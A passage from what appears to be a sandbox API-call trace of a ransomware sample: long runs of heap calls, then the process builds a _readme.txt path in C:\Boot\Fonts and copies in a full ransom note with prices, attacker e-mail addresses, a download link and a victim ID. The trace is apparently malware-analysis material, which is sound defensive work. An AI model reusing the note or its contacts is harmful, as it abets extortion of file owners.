0x31ed6c0 [0227.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.956] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.956] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.956] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.956] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.956] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.956] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.956] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.956] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.956] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.956] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.956] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.956] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.956] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.957] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.957] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.957] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.957] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.957] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.957] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.957] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.957] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.957] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.957] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.957] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.957] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.957] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.958] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.958] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.958] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.958] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.958] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.958] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.958] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.958] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.958] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.958] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.958] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.958] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.959] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.959] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.959] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.959] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.959] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.959] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.959] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.959] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.959] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.959] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.959] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.959] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.959] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.959] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.959] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.959] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.959] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.959] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.959] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.959] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.959] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.959] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.959] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.959] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.960] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.960] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.960] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0227.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.960] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.960] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.960] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.960] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.960] PathFindFileNameW (pszPath="") returned="" [0227.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.960] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.961] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.961] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0227.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.961] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x37a2b08 [0227.961] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0227.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.962] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 0 [0227.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.962] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.962] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.962] CreateFileW (lpFileName="C:\\Boot\\Fonts\\_readme.txt" (normalized: "c:\\boot\\fonts\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.963] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.963] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.963] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, 